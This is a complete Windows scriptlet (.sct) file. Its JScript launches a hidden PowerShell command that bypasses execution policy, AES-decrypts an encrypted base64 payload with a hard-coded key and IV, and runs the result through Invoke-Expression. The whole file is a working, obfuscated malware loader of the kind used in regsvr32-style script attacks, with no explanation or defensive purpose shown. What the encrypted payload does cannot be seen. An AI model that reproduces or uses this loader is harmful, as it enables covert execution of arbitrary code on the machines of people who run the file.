<?XML version="1.0"?>
<scriptlet>
<registration
    description="AESDecryptionExecution"
    progid="AESDecryptionExecution"
    version="1.0"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
        <![CDATA[
            try {
                var shell = new ActiveXObject("WScript.Shell");

                var psCommand = "powershell -nop -w hidden -ep bypass -Command \"";
                psCommand += "$encBytes = [Convert]::FromBase64String('a/3PB6NZx85hZFmQoteu8jxhrT1oRBLqE8w8YgInrEXwTqb1m6SpjibGyqLsygwlQVnvPmMOtmqLzuJw72iHvttwAy1E2ybhJDce7osYwY5zHNASAgm16KBQOG8kti8g6zqmh++RqmKxCGX3qRX5ba5rOenPDg5HxmUV0AuUcabcIdx0zwxfAczHdjZTaFU0NGuXSKJSelNDS/LQzQV6sSxQ8UuKkn1y0TrV/z9zz3g=');";
                psCommand += "$aes = [System.Security.Cryptography.Aes]::Create();";
                psCommand += "$aes.Key = $([Convert]::FromBase64String('yMOoMUAFew+MP8evzUXfe6Up9DShHqFOAfD4N+hseaw='));";
                psCommand += "$aes.IV = $([Convert]::FromBase64String('9uxCnOK25mNL4xP2IsJ0KA=='));";
                psCommand += "$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC;";
                psCommand += "$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;";
                psCommand += "$decryptor = $aes.CreateDecryptor();";
                psCommand += "$decBytes = $decryptor.TransformFinalBlock($encBytes, 0, $encBytes.Length);";
                psCommand += "iex $([System.Text.Encoding]::UTF8.GetString($decBytes))\"";

                shell.Run(psCommand, 0, false);
            } catch (e) {
                var shell = new ActiveXObject("WScript.Shell");
                shell.Popup("Error: " + e.message, 0, "Execution Error", 16);
            }
        ]]>
    </script>
</registration>
</scriptlet>
